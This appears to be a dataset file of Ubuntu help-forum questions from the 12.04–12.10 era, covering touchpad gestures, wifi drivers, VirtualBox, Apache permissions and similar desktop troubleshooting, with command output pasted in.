232010	lenovo ideapad u410 - multitouch support	for the last 3 month i 've been trying to make touchegg to support more then 2 finger gestures with my lenovo ideapad u410 . i tried to run touchegg on : ubuntu 12.04 , ubuntu 12.10 , ubuntu gnome remix 12.04 and ubuntu gnome remix 12.10 . now i 'm running ubuntu gnome remix 12.10 ( because i understood that 3 fingers gestures might be reserved in unity . ) after disabling synclient by this commands : synclient tapbutton2=0 synclient tapbutton3=0 synclient clickfinger2=0 synclient clickfinger3=0 synclient horiztwofingerscroll=0 synclient verttwofingerscroll=0 i only manage to enable 2 fingers gestures so far . lately i 've discovered that geistest shows me this following output : device 45280 added attr `` device name '' = `` synps/2 synaptics touchpad '' attr `` device id '' = 45280 attr `` device touches '' = 2 attr `` direct touch '' = false attr `` independent touch '' = false attr `` device x minimum '' = 1472.000000 attr `` device x maximum '' = 5664.000000 attr `` device x resolution '' = 42000.000000 attr `` device y minimum '' = 1408.000000 attr `` device y maximum '' = 4682.000000 attr `` device y resolution '' = 52000.000000 is that mean that my synaptics driver support only 2 fingers ? ! ? ! if so how can it be ? under windows i do have more then 2 finger gestures ... please if any one can help my ... this issue driving my crazy = . thx , gal .
232015	why is n't virtualbox working for me ?	why is n't virtualbox running virtual machines for me ? i have tried microsoft xp , vista , 7 , 8 and mac os x all of which have failed to run for me . that is they 'start ' when i send the command to start but then they abort or just fail to continue running immediately after i 've started them . my host os is 12.10 .
232020	how to install evolution 3.6.2 from 13.04 into 12.10 ?	it 's all in the question , really . currently running evolution 3.6.0 on ubuntu 12.10 and , as anybody who has tried this at all will know , it locks up regularly with a 'saving user interface ' report and several 'unknown background task ' reports . the only way to exit under these circumstances is to kill evolution cold . this is making evolution almost unusable . is it possible to back-port manually from raring to quantal or is there somewhere to request that it should be done at distro level through the proper ubuntu channels ? edit =========================================================== i was able to make evolution much more usable , and stop all the 'saving user interface ' lockups by unchecking the option to show sender 's photo from address book , i.e . edit > preferences > mail preferences > headers > sender 's photograph . ca n't remember where i got this from , but believe it was from one of the developers . hope it helps those still struggling with this .
232023	problem with lightdm & kdm	i 'm a kubuntu 12.10 x86_64 user . i recently found an exquisite kdm theme on ( name of kde artwork site ) . however , as the default display manager in kubuntu is lightdm , i installed kdm with : sudo apt-get install kdm then , i did sudo dpkg-reconfigure lightdm and chose kdm . after i rebooted , the plymouth splash ( the kubuntu ubuntu-circle-of-friends-surrounded-by-cogs ) was stuck in a loop , therefore i alt-f2'ed and after logging in , typed in : sudo startx this worked the first time , and the system settings app was expanded by the new sub-app `` login screen '' next to `` login screen ( lightdm ) '' , but after a reboot , it did not work at all ( it said something about a timeout in x-authority or some other such thing ) . so i chose lightdm again in the text shell and rebooted . once again it looped , but this time i was able to log into the desktop ( as root ) . i searched for this and all i got was generic `` i boot to busybox shell '' and `` gui fails '' questions .
232024	sync music to ipod 4g	i want to sync music to ipod 4g device , without the use of itunes in ubuntu 10.04 , i used to do this with gtkpod until gtkpod stopped supporting fourth generation ipods . i tried to setup itunes with wine , but in vain . is there any other open source software which can help me with this ? i do not want to instal windows for this .
232026	external dvd writer not detected in xfburn	i have an external dvd writer ( brand : buffalo ) and it is not detected in xfburn . how do i solve this ? $ udevadm info -- name=/dev/sr1 -- query=all p : /devices/pci0000:00/0000:00:1d.7/usb2/2-1/2-1:1.0/host7/target7:0:0/7:0:0:0/block/sr1 n : sr1 s : cdrom1 s : cdrw1 s : disk/by-id/usb-buffalo_optical_drive_303042323932363132303730 s : disk/by-path/pci-0000:00:1d.7-usb-0:1:1.0-scsi-0:0:0:0 s : dvd1 s : dvdrw1 e : devlinks=/dev/cdrom1 /dev/cdrw1 /dev/disk/by-id/usb-buffalo_optical_drive_303042323932363132303730 /dev/disk/by-path/pci-0000:00:1d.7-usb-0:1:1.0-scsi-0:0:0:0 /dev/dvd1 /dev/dvdrw1 e : devname=/dev/sr1 e : devpath=/devices/pci0000:00/0000:00:1d.7/usb2/2-1/2-1:1.0/host7/target7:0:0/7:0:0:0/block/sr1 e : devtype=disk e : generated=1 e : id_bus=usb e : id_cdrom=1 e : id_cdrom_cd=1 e : id_cdrom_cd_r=1 e : id_cdrom_cd_rw=1 e : id_cdrom_dvd=1 e : id_cdrom_dvd_plus_r=1 e : id_cdrom_dvd_plus_rw=1 e : id_cdrom_dvd_plus_r_dl=1 e : id_cdrom_dvd_r=1 e : id_cdrom_dvd_ram=1 e : id_cdrom_dvd_rw=1 e : id_cdrom_media=1 e : id_cdrom_media_dvd_r=1 e : id_cdrom_media_session_count=1 e : id_cdrom_media_session_next=1 e : id_cdrom_media_state=blank e : id_cdrom_media_track_count=1 e : id_cdrom_mrw=1 e : id_cdrom_mrw_w=1 e : id_model=optical_drive e : id_model_enc=optical\x20drive e : id_model_id=01dc e : id_path=pci-0000:00:1d.7-usb-0:1:1.0-scsi-0:0:0:0 e : id_path_tag=pci-0000_00_1d_7-usb-0_1_1_0-scsi-0_0_0_0 e : id_revision=0200 e : id_serial=buffalo_optical_drive_303042323932363132303730 e : id_serial_short=303042323932363132303730 e : id_type=floppy e : id_usb_driver=usb-storage e : id_usb_interfaces=:080550 : e : id_usb_interface_num=00 e : id_vendor=buffalo e : id_vendor_enc=buffalo e : id_vendor_id=0411 e : major=11 e : minor=1 e : subsystem=block e : tags= : udev-acl : e : udev_log=3 e : udisks_presentation_nopolicy=0 e : usec_initialized=25401156756
232031	dell inspiron 1120 wifi , bluetooth problems	( a related question found here . ) i 've been used 11.04 , now 12.04 lts , and if there is solution , i do n't want to upgrade from that lts . the first problem is , that the network-manager/networking behaves wrong : when i 'm on battery , the wifi connects ( the mobile broadband also ) , but no network can be accessed , like when something timing out . if i connect the ac charger , it immediately starts working . usually just lists the options : enable network , enable wireless network , enable mobile broadband , edit networks & network information , there are no lists of available networks , etc ... bluetooth : the bluetooth is always turns on on start up , but when i turn it off on another 12.04 lts , it remembers , and does n't turn on on start up . conclusion : this laptop is no longer mobile , it requires ac charger to connect to networks . what i have tried to solve the main problem ? upgrade the network-manager , to the latest daily ppa version : 0.9.6.0~git201208071622.5714-0~pkg562~precise1 replace wireless driver with b43 , but is was not supported ( how do i get a broadcom bcm4313 wireless card working ? ) upgrade the bios . now i have version a05 , the latest is a06 , but i could n't because i have n't found the hdr file in dell 's repos ( there is no *system_bios_ven_0x1028_dev_0x0470_version_a06* dir ) , and i could't generate if from the windows executable ( wine /writehdrfile /nopause now does n't work ) - original tutorial is here install some dell software/firmware : ii dell-dup 1.1.3-0ubuntu2 a firmware-tools plugin for dell dup images ii firmware-addon-dell 2.2.9-0ubuntu1 a firmware-tools plugin to handle bios/firmware for dell systems information : sudo lshw -class network *-network description : ethernet interface product : ar8132 fast ethernet vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth0 version : c0 serial : 5c:26:0a:46 : bd:49 capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vpd bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=atl1c driverversion=1.0.1.0-napi firmware=n/a latency=0 link=no multicast=yes port=twisted pair resources : irq:43 memory : d0200000-d023ffff ioport : a000 ( size=128 ) *-network description : wireless interface product : bcm4313 802.11b/g/n wireless lan controller vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:03:00.0 logical name : eth1 version : 01 serial : 88:25:2c : e4:55:83 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=wl0 driverversion=5.100.82.38 ip=172.27.1.13 latency=0 multicast=yes wireless=ieee 802.11 resources : irq:17 memory : d0300000-d0303fff *-network disabled description : ethernet interface physical id : 2 logical name : wwan0 serial : 02:80:37 : ec:02:00 capabilities : ethernet physical configuration : broadcast=yes driver=cdc_ether driverversion=22-aug-2005 firmware=mobile broadband network device link=no multicast=yes sudo lspci -vnn -d 14e4 : 03:00.0 network controller [ 0280 ] : broadcom corporation bcm4313 802.11b/g/n wireless lan controller [ 14e4:4727 ] ( rev 01 ) subsystem : broadcom corporation device [ 14e4:051a ] flags : bus master , fast devsel , latency 0 , irq 17 memory at d0300000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : [ 40 ] power management version 3 capabilities : [ 58 ] vendor specific information : len=78 capabilities : [ 48 ] msi : enable- count=1/1 maskable- 64bit+ capabilities : [ d0 ] express endpoint , msi 00 capabilities : [ 100 ] # 14e4 kernel driver in use : wl kernel modules : wl , bcma , brcmsmac sudo smbios-sys-info libsmbios version : 2.2.28 product name : inspiron 1120 vendor : dell inc. bios version : a05 system id : 0x0470 lcpci 00:00.0 host bridge : advanced micro devices [ amd ] rs880 host bridge 00:01.0 pci bridge : dell device 9602 00:04.0 pci bridge : advanced micro devices [ amd ] rs780/rs880 pci to pci bridge ( pcie port 0 ) 00:05.0 pci bridge : advanced micro devices [ amd ] rs780/rs880 pci to pci bridge ( pcie port 1 ) 00:11.0 sata controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 sata controller [ ahci mode ] 00:12.0 usb controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ohci0 controller 00:12.2 usb controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ehci controller 00:13.0 usb controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ohci0 controller 00:13.2 usb controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ehci controller 00:14.0 smbus : advanced micro devices [ amd ] nee ati sbx00 smbus controller ( rev 42 ) 00:14.2 audio device : advanced micro devices [ amd ] nee ati sbx00 azalia ( intel hda ) ( rev 40 ) 00:14.3 isa bridge : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 lpc host controller ( rev 40 ) 00:14.4 pci bridge : advanced micro devices [ amd ] nee ati sbx00 pci to pci bridge ( rev 40 ) 00:18.0 host bridge : advanced micro devices [ amd ] family 10h processor hypertransport configuration 00:18.1 host bridge : advanced micro devices [ amd ] family 10h processor address map 00:18.2 host bridge : advanced micro devices [ amd ] family 10h processor dram controller 00:18.3 host bridge : advanced micro devices [ amd ] family 10h processor miscellaneous control 00:18.4 host bridge : advanced micro devices [ amd ] family 10h processor link control 01:05.0 vga compatible controller : advanced micro devices [ amd ] nee ati rs880m [ mobility radeon hd 4200 series ] 01:05.1 audio device : advanced micro devices [ amd ] nee ati rs880 hdmi audio [ radeon hd 4200 series ] 02:00.0 ethernet controller : atheros communications inc. ar8132 fast ethernet ( rev c0 ) 03:00.0 network controller : broadcom corporation bcm4313 802.11b/g/n wireless lan controller ( rev 01 ) lsmod module size used by dm_crypt 23125 1 joydev 17693 0 snd_hda_codec_hdmi 32474 1 snd_hda_codec_realtek 224173 1 snd_hda_intel 33773 4 snd_hda_codec 127706 3 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_hda_intel snd_hwdep 17764 1 snd_hda_codec dell_wmi 12681 0 snd_pcm 97275 3 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec sparse_keymap 13890 1 dell_wmi snd_seq_midi 13324 0 snd_rawmidi 30748 1 snd_seq_midi snd_seq_midi_event 14899 1 snd_seq_midi dell_laptop 18119 0 snd_seq 61929 2 snd_seq_midi , snd_seq_midi_event dcdbas 14490 1 dell_laptop snd_timer 29990 2 snd_pcm , snd_seq snd_seq_device 14540 3 snd_seq_midi , snd_rawmidi , snd_seq fglrx 3264017 69 uvcvideo 72627 0 videodev 98259 1 uvcvideo ums_realtek 18248 0 cdc_ether 13536 0 usbnet 26212 1 cdc_ether psmouse 97485 0 v4l2_compat_ioctl32 17128 1 videodev snd 79041 18 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device uas 18180 0 cdc_wdm 17581 0 cdc_acm 26821 0 serio_raw 13211 0 edac_core 53746 0 soundcore 15091 1 snd sp5100_tco 13791 0 k10temp 13166 0 edac_mce_amd 23709 0 snd_page_alloc 18529 2 snd_hda_intel , snd_pcm i2c_piix4 13301 0 btusb 18332 1 shpchp 37277 0 rfcomm 47604 0 bnep 18281 2 bluetooth 180153 13 btusb , rfcomm , bnep parport_pc 32866 0 ppdev 17113 0 binfmt_misc 17540 1 mac_hid 13253 0 lib80211_crypt_tkip 17390 0 wl 2568249 0 lib80211 14381 2 lib80211_crypt_tkip , wl lp 17799 0 parport 46562 3 parport_pc , ppdev , lp vesafb 13844 1 usb_storage 49198 1 ums_realtek wmi 19256 1 dell_wmi video 19596 0 atl1c 41718 0
232033	start up terminal with command ; then go to bash shell	via a desktop shortcut , an admin will launch a shell as another user . the user should go into the shell with no elevated privileges , but execute the first command with elevated privileges . in the end , the user should be in non-privileged shell that is kept open for further use . how do i do this ? question edited for wip answer . latest test : gksudo `` gnome-terminal -- execute bash -c 'boss `` apt-get update '' ; bash ' '' does not work . what follows is the answer thanks to laurent helping me brainstorm . unfortunately my situation was too sophisticated for me to express well . i have an admin user who never goes online . he uses proxy users to fetch things and do his bidding . the user named update is in the sudoers file and is allowed to apt-get with nopasswd . admin wants a shortcut leading to a gnome-terminal that automatically calls apt-get update upon execution because admin wants to install something right after that , something that ca n't be predicted to be put in a script . auto updates wo n't work for admin , because admin is fire-walled from the internet and is forced to hire goons for system updates and fetching other downloads . thank you laurent for leading me to the right answer ! here it is : gksudo -u update `` gnome-terminal -- execute bash -c 'sudo apt-get update ; bash ' ''
232036	can not see wine 's c drive	i have a problem . my wine has a c drive , but it 's invisible . when i try to locate it in terminal , i can see the path : /home/michal/.wine/drive_c/windows problem is , when i open my user directory `` michal '' , the /.wine/ directory is not visible . it 's simply not there . how can i access it using ubuntu 's graphic interface ?
232038	how to change empathy appearance in 12.10 ?	since i updated to quantal , i can not modify empathy 's appearance . in particular , i want empathy to shows just the names and status icons of my contacts , without avatars and other stuff . in the preferences preference there is no options to modify for this . i tried editing the gconf-editor keys , but i did not obtain any changes .
232041	installing ubuntu : dual-boot repartition exisiting windows 7	i have been using ubuntu for 5 years now and had no problem with dual-booting with windows xp . i got a new laptop with preinstalled windows 7 partitions . the problem is that although there are plenty of space on it , there are already 4 primary partitions on my system . i tried allocating free space on the 2nd large partition but gparted and ubuntu installer wo n't let me create a 4th partition . i am wondering how i should re partition in order to install ubuntu alongside win7 . if it involves removing a partition or merging , if possible , can you go through explaining the possible consequences involved ? thanks very much and any help at all is appreciated . the following is a screen-shot of my existing partitions :
232045	web server on local network	i have problem accessing ( one of my ) web server from my local network . i have a ( ubuntu ) computer that that acts as router , web server etc . that works well , i can access the web server both externally and from the internal network . i can also access computers on the internal network via ssh from the outside ( re-direction with iptables ) . now i have another web server on the internal network . i have made some routing paths with iptables . if i in the browser type some.webadress.com:40080 it should go to the âinternalâ web server . this works : access the internal web server with the domain name ( +port ) from an external network access the internal web server with the internal ip number ( +port ) from the internal network this does not work : access the internal web server with the domain name ( +port ) from the internal network i 'm pretty sure that the routing part works ok . the question is if i have to have a dns or is it something that i should add/change in my /etc/hosts file ? edit : some clarification . the device/webserver that i 'm having problem to reach is a webswitch . the webswitch is a device that makes it possible to control a number of high-voltage relays ( e.g . car heater , external lights etc . ) via the web/phone app . the problem arises when a smartphone is used . if i 'm on the 3g net , i use some.webadress.com:40080 ( note that i use port translation ) and if i 'm on the home-wifi i must use 192.168.0.101:8080 . what i want to use is some.webadress.com:40080 regardless if i 'm on the local net or an external net . ( the better half in the family is not that interested in technical stuff so having to swift addresses is actually an issue : )
232049	wireless problems with broadcom bcm4313	i have a wireless problem with this wifi adapter . at first when installing my ubuntu 12.10 the sta driver was working fine . then my wired connection was n't working . after installing the alx driver and modprobing it the wire started working flawlessly . then my wireless failed . there was n't anything about wireless in the network manager . i 've already looked and did what is said here , here . i removed the bcmwl-kernel-source package and installed firmware-b43-installer and b43-fwcutter . i 've added the b43 driver in /etc/modules . then my wireless started working again for a while ( 1-2 minutes of browsing ) and then disconnected . the only wireless network my laptop finds is my own wireless network ( the router is next to my pc ) . there are a number of other networks in my building that do n't show . after a reboot , the wireless 'decided ' not to work again - int the network manager it 's only stated : `` wireless networks disconnected '' . so now i have only wired connection . there is the output of some commands related to the issue : lspci -vvnn | grep 14e4 : 03:00.0 network controller [ 0280 ] : broadcom corporation bcm4313 802.11b/g/n wireless lan controller [ 14e4:4727 ] ( rev 01 ) subsystem : broadcom corporation device [ 14e4:0587 ] iwconfig : eth1 no wireless extensions . lo no wireless extensions . wlan0 ieee 802.11bgn essid : off/any mode : managed access point : not-associated tx-power=19 dbm retry long limit:7 rts thr : off fragment thr : off power management : off rfkill list all : 0 : ideapad_wlan : wireless lan soft blocked : no hard blocked : no 1 : ideapad_bluetooth : bluetooth soft blocked : no hard blocked : no 2 : phy1 : wireless lan soft blocked : no hard blocked : no lsmod : module size used by nfnetlink_log 17845 0 nfnetlink 14327 1 nfnetlink_log snd_hda_codec_hdmi 32007 1 snd_hda_codec_conexant 57842 1 parport_pc 32688 0 ppdev 17073 0 rfcomm 42651 0 bnep 18140 2 bluetooth 204950 10 rfcomm , bnep arc4 12529 2 coretemp 13400 0 kvm 414070 0 ghash_clmulni_intel 13180 0 aesni_intel 51037 0 cryptd 20403 2 ghash_clmulni_intel , aesni_intel aes_x86_64 17208 1 aesni_intel brcmsmac 531127 0 brcmutil 14755 1 brcmsmac cordic 12535 1 brcmsmac snd_hda_intel 33491 3 snd_hda_codec 134212 3 snd_hda_codec_hdmi , snd_hda_codec_conexant , snd_hda_intel snd_hwdep 13602 1 snd_hda_codec snd_pcm 96580 3 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec b43 370289 0 mac80211 549340 2 brcmsmac , b43 cfg80211 211133 3 brcmsmac , b43 , mac80211 snd_seq_midi 13324 0 snd_rawmidi 30512 1 snd_seq_midi snd_seq_midi_event 14899 1 snd_seq_midi snd_seq 61521 2 snd_seq_midi , snd_seq_midi_event ideapad_laptop 18086 0 sparse_keymap 13890 1 ideapad_laptop snd_timer 29425 2 snd_pcm , snd_seq snd_seq_device 14497 3 snd_seq_midi , snd_rawmidi , snd_seq nouveau 895609 0 psmouse 95552 0 uvcvideo 76749 0 serio_raw 13215 0 videobuf2_core 32851 1 uvcvideo videodev 120309 2 uvcvideo , videobuf2_core videobuf2_vmalloc 12860 1 uvcvideo joydev 17457 0 videobuf2_memops 13368 1 videobuf2_vmalloc ttm 83595 1 nouveau lpc_ich 17061 0 mac_hid 13205 0 i915 520539 3 snd 78734 16 snd_hda_codec_hdmi , snd_hda_codec_conexant , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , s nd_rawmidi , snd_seq , snd_timer , snd_seq_device alx 81256 0 mxm_wmi 12979 1 nouveau wmi 19070 2 nouveau , mxm_wmi bcma 40069 2 brcmsmac , b43 ssb 61895 1 b43 soundcore 15047 1 snd snd_page_alloc 18484 2 snd_hda_intel , snd_pcm pcmcia 48964 2 b43 , ssb pcmcia_core 22569 1 pcmcia compat 14949 10 rfcomm , bnep , bluetooth , brcmsmac , b43 , mac80211 , cfg80211 , alx , bcma , ssb mei 40690 0 drm_kms_helper 49112 2 nouveau , i915 rts5139 356158 0 microcode 22803 0 drm 288670 6 nouveau , ttm , i915 , drm_kms_helper lp 17759 0 parport 46345 3 parport_pc , ppdev , lp i2c_algo_bit 13413 2 nouveau , i915 video 19335 2 nouveau , i915 hid_generic 12493 0 usbhid 46947 0 hid 100366 2 hid_generic , usbhid can someone give any ideas on how i can fix my wireless to run smoothly ?
232051	how do i uninstall kubuntu ?	have a small laptop that i have n't used in a while . its operating system is kubuntu 11.10 , which i also have on a separate pc . i want to use the laptop for running some windows xp applications that wo n't run on linux ( even with `` wine '' ) and want to uninstall kubuntu . i do n't want the two systems on the same machine . i have tried using the windows xp pro ( sp3 ) installation disc i bought for the purpose , booting up from a cd drive but , at the end of the file-loading procedure , i get the blue screen of death . i tried the same using the windows xp pro must be ( sp2 ) installation disc that came with my desktop pc and get the same result . i think the problem is that it does n't like the presence of kubuntu . or , i suppose , there could be a virus present that my firewall did n't eliminate . could somebody please provide the correct commands which i can enter in a terminal window to completely uninstall kubuntu and all its packages ( or tell me how to re-format the hard drive ) . so that i can re-try installing windows without kubuntu lurking in the background ?
232053	how to add a shortcut to a command to the cinnamon menu ?	is there a utility i can use to add an icon to the cinnamon menu which runs a user-specified command , and as a bonus , displays a user-specified icon ? specifically i 'm trying to add a command to open a virtual machine directly , without having to keep the terminal open . virtualbox -- startvm < mymachinename > -- seamless works fine with alt-f2 , but i 'd rather have a short-cut so i do n't have to type it out .
232054	i can not get /mnt/hgfs in ubuntu 12.10	i have installed ubuntu 12.10 in vmware 5.i need to mount my project ( using aptana studio 3 , ruby on rails project in my workspace ) .i have even shared workspace in vmware.but still i can not see it when i run cd /mnt/hgfs/my workspace/project_1 , there is no hgfs folder in mnt.i have ruby on 1.9.2 and rails 3.2 .
232060	a lot of noise on image	hi i have some image problem both in libreoffice draw and default image viewer that the picture is so noisy but when i look into another image viewer the image become less noisy . and i realize when i print out the image from libreoffice draw it 's give same result : have a lot of noise in the image then i print out the same image from windos the image is fine , is this problem fixed by downloading some certain code or anything else ? i have ubuntu 12.04 , i open jpg image one from pocket camera and another from web both of them is jpg
232068	self-hosted browser based irc client alternatives	i have looked at the self-hosted web browser based irc-clients subway and alice as i never seem to get an invite for irccloud . the two alternatives i have found suffer from really bad bugs . they work for about an hour , and then it seems their communication with their backends just falls apart . subway duplicates all open channels ever few hours and sometimes sporadically reloads . alice has ridiculously long delays for delivering messages . side-by-side with another client it can be up to 15 minutes ( ! ) out of sync , and that will not do for an instant messaging client . are there any other alternatives i should take a look at ? or services ? the desktop irc clients for linux simply does not cut it for me , and i like having a persistent connection that i can join from wherever .
232072	changed lamp www directory to dropbox , now getting 403 forbidden	i wan to use my dropbox/web directory as the server directory for lamp . i cahnged /etc/apache2/sites-available/default documentroot /home/me/dropbox/web # changed from /etc/www < directory / > options followsymlinks allowoverride none < /directory > < directory /home/me/dropbox/web/ > # changed from /etc/www options indexes followsymlinks multiviews allowoverride none order allow , deny allow from all < /directory > and now i get forbidden you do n't have permission to access / on this server . apache/2.2.22 ( ubuntu ) server at localhost port 80
232076	how do i find the chokepoint in my private ethernet network ?	i 'm currently living in a rather austere part of the world where i have limited access to good computer hardware . i have a private network set up where an old ibm thinkpad laptop ( lubuntu 12.10 ) sits on my `` porch '' where it can see a wifi network . it shares its connection through its ethernet port and is connected to a no-name ethernet hub . in my room i use a somewhat more modern hp elitebook 8440p ( ubuntu 12.04 lts ) . the setup is quite satisfactory for web browsing and ssh . however , the ethernet connection is definitely very slow and i do n't know why . for instance , ping from one machine to the other gives me times that are > 700 ms and large file scp between machines settles down at ~1.1 mb/s . i would like to know what is limiting my connection speed , whether it 's settings or hardware . however , i have no idea how to go about it . if it 's hardware , my options are limited at the moment , but it would be good to know . otoh , if i can isolate the problem to the generic hub , i can possibly get my hands on a crossover ethernet cable . regards ,
232079	can not run executable file - spaz installer	after reinstalling my ubuntu ( right now i have 12.04.1 ) i 'm trying to install spaz , but when i run the installer : gacek @ gacek-vostro-3460 : ~ $ ./spaz-linux-humblebundle-09182012-bin bash : ./spaz-linux-humblebundle-09182012-bin : no such file or directory it says there 's no such file . but it exist . i 've tried to change the ownership of the file , change the access flags for it . the executable flag is also enabled . where could be the problem ? regarding the question , the file exists and it is not a directory : gacek @ gacek-vostro-3460 : ~ $ ls -g razem 168776 drwxrwxrwx 2 1000 4096 dec 22 23:25 desktop ( ... ) -rwxr-xr-x 1 gacek 157466422 sep 19 01:15 spaz-linux-humblebundle-09182012-bin
232080	unable to change the flash microphone settings	i want to find out the name of a song by singing or humming it on midomi . i follow these steps : i go on the website «www.midomi.com» ; i click on the area «click and sing or hum» : a message appears saying «you must first `` allow '' permissions in `` microphone settings '' to use voice search» and showing the button «microphone setting» ; i left-click on the button : nothing happens ; i right-click on it : a menu containing the entry «global settings ... » shows ; i click on the entry : the «adobe flash player preferences» appears ; i click on the tab «camera and mic» , then on the button «camera and microphone settings by site ... » : a new window opens ; i save «www.midomi.com» and «midomi.com» as «allow» , then exit . nonetheless , the problem is not resolved : i ca n't sing or hum the song as the microphone settings message is still there . my system : – os : ubuntu 12.10 desktop 32 bit ; – www browser : firefox 17.0.1 . any suggestions ?
232082	graphics in wine are behind by one update	as the title says , graphics objects ( in particular 3d graphics , but not exclusively ) are displaying one update behind . i first noticed the problem when using google sketchup together with sketchy physics , but this problem actually occurs in all my wine programs . specifically , whenever i would click or select or whatever some part of my model in sketchup , the object would not highlight until i did something else that would update the display . for instance , i click on one of the edges of a cube . no change to the display . then i click on the side of the cube . the display now shows the edge highlighted . i tap the delete key , the 3d view now shows the cube with the side highlighted . i rotate the view , it then shows the cube with one face gone . while most noticeable while using sketchup , i have occasionally had that problem for a short time while using other programs , however it went away after a while . what do i need to do to stop this happening ? information about my environment : ubuntu 12.10 wine 1.4.1 sketchup 8 sketchy physics 3.2 memory : 7.3 gib processor : amd a6-5400k apu with radeon ( tm ) hd graphics ă 2 graphics : gallium 0.4 on amd aruba os type : 64-bit disk : 976.6 gb
232084	xscreensaver does not turn monitor off in lubuntu	if i minimize thunderbird or firefox or whatever i currently am working on , then leave the system alone it should turn the monitor off after a set number of minutes . xscreensaver is not turning off the monitor ( however it will dim ) if anything is left minimized in the lxpanel . what is the resolve ?
232086	remove full path from terminal	is it possible to show in the terminal line only the current directory , not the whole path from the home folder ? i have now this : ilya @ ubuntu : ~/dropbox/web/folder/folder/ $ and it takes almost all the screen ...
232088	pdfs do n't open	pdfs have curiously stopped working for me . i click on them , and nothing happens . ps still works , and opening them in firefox pdf.js still works too . when i try to open them with evince through the terminal , it spits out a bunch of repetitive warnings like ** ( evince:3383 ) : warning ** : error setting file metadata : no such file or directory ** ( evince:3372 ) : warning ** : error when getting information for file ' ... ' : no such file or directory fontconfig warning : `` /etc/fonts/conf.d/50-user.conf '' , line 9 : reading configurations from ~/.fonts.conf is deprecated . fontconfig warning : `` /etc/fonts/conf.d/50-user.conf '' , line 9 : reading configurations from ~/.fonts.conf is deprecated . fontconfig warning : `` /etc/fonts/conf.d/50-user.conf '' , line 9 : reading configurations from ~/.fonts.conf is deprecated . fontconfig warning : `` /etc/fonts/conf.d/50-user.conf '' , line 9 : reading configurations from ~/.fonts.conf is deprecated . fontconfig warning : `` /etc/fonts/conf.d/50-user.conf '' , line 9 : reading configurations from ~/.fonts.conf is deprecated . for some reason , if i remove all the spaces from the file name , and run the same terminal command , evince will open the file . clicking on it from nautilus still does n't work .
232092	how to install ubuntu for android on jelly bean 4.1 ?	i 've got android 4 , i on my samsung galaxy note 2 . could anyone please help me with installing ubuntu for android on it . ( sorry for possible dublicate )
232094	ubuntu 12.10 bose companion 5 not working	i recently installed ubuntu 12.10 , and i can see it in the list of inputs . but when i select it then no sound i have tried restarting pulse audio demon and i have tried purging .pulse and .pulse-cookie directory as well . as i said it is visible in list but after selection no sound i have tried changing the 5.1 and 4.1 as well .
232095	unknown external display after recent update ?	last week i installed recommended updates on ubuntu 12.04 lts , all well and good but since this update i have encountered 2 problems : 1 - external display no longer works , system can be seen to cycle through external and internal displays since internal display flashes as it is going to go to external , but nothing happens on external display . in display window shows as 'unknown ' 2 - can no longer run update manager , 404 file not found error with following error : failed to download repository information check your internet connection . could anyone suggest any ideas ? any comments would be greatly appreciated .
232096	how do i install ubuntu one on fedora 17 ?	( edited google translation . ) i have a new hard drive and installed fedora 17 on it . my other computers use ubuntu one , by having either ubuntu or windows on them . i 'd like to install the ubuntu one client on fedora 17 in rpm format , but can not find it anywhere , any ideas ? original spanish question : como instalo ubuntuone en fedora 17 ? tengo un nuevo disco duro e instale fedora 17 en mis otras computadoras uso ubuntuone , por que tienen ubuntu o windows , pero quiero instalar el cliente de ubuntuone en fedora 17 y el rpm no lo encuentro por ningun lado , alguna idea ?
232104	ubuntu does n't boot after installation	i installed ubuntu 12.10 on a lenovo thinkpad from a bootable usb device . the automatic installation of grub failed so i followed the instructions for manually installing grub which works without errors . now grub does n't load after restarting the laptop ; there is only a menu where i can choose from which device i want to boot but there it stucks . at the moment i do n't know if grub is correctly installed or if the error is somewhere else .
232106	windows not showing ubuntu files in d drive which i installed ubuntu	i installed ubuntu in d drive but it only showing installation files but it cant showing the ubuntu files that means ubuntu files of my system homefolder and desktop files etc.can you help for this issue please
232108	gamepad controller issues on ubuntu 12.04+	for whatever reason i can never get any of my controllers to work properly on ubuntu . the main one i want to get working is the xbox 360 controller ( wired , not wireless ) . it detects the l and r triggers as axis which causes serious issues in a majority of games . i press any of the triggers and it suddenly makes the game unplayable . a similar issue occurs with the ps3 controller . i thought that if i bought a pc game controller it would fix my issue ... but man was i wrong . is there some type of secret method to getting this to work ... i 'm so irritated ! ! ! even configuring inputs for emulators is a pain . if i press say `` a '' once it shoots the entire list down with button 1 .
232111	how to enable laptop mode tools in ubuntu 12.10	i have a lenovo z570 running ubuntu 12.10 with a battery life approximately 1hr 30 min . please help me maximize the battery life of my lenovo
